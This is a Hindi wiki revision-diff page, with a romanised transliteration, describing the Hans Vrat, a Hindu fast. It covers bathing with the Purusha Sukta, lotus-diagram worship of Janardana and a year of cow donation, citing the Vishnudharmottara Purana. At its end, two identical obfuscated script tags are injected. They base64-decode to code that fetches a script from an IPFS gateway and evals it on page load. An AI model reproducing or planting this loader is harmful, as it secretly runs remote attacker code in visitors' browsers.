Difference between revisions of "हंस व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (हंसव्रत का नाम बदलकर हंस व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(4 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*हंसव्रत में पुरुषसूक्त के पाठ के साथ स्नान करना चाहिए।
 
*हंसव्रत में पुरुषसूक्त के पाठ के साथ स्नान करना चाहिए।
 
*उसी के पाठ के साथ अर्पण एवं जप करना चाहिए।
 
*उसी के पाठ के साथ अर्पण एवं जप करना चाहिए।
 
*अष्टदल [[कमल]] के चित्र के मध्य में स्थापित [[हंस]] नाम से [[पुष्प|पुष्पों]] आदि द्वारा जनार्दन की पूजा करनी चाहिए।
 
*अष्टदल [[कमल]] के चित्र के मध्य में स्थापित [[हंस]] नाम से [[पुष्प|पुष्पों]] आदि द्वारा जनार्दन की पूजा करनी चाहिए।
 
*हंसव्रत में [[गोदान]], एक वर्ष तक करना चाहिए।
 
*हंसव्रत में [[गोदान]], एक वर्ष तक करना चाहिए।
*ऐसी मान्यता है कि हंसव्रत से सभी कामनाओं की पूर्ति होती है।<ref>विष्णुधर्मोत्तरपुराण (3|225|1-9)</ref>
+
*ऐसी मान्यता है कि हंसव्रत से सभी कामनाओं की पूर्ति होती है।<ref>विष्णुधर्मोत्तरपुराण (3|225|1-9</ref>
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=आधार1
 
|आधार=आधार1
Line 12: Line 13:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 13:02, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • hansavrat mean purushasookt ke path ke sath snan karana chahie.
  • usi ke path ke sath arpan evan jap karana chahie.
  • ashtadal kamal ke chitr ke madhy mean sthapit hans nam se pushpoan adi dvara janardan ki pooja karani chahie.
  • hansavrat mean godan, ek varsh tak karana chahie.
  • aisi manyata hai ki hansavrat se sabhi kamanaoan ki poorti hoti hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|225|1-9

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>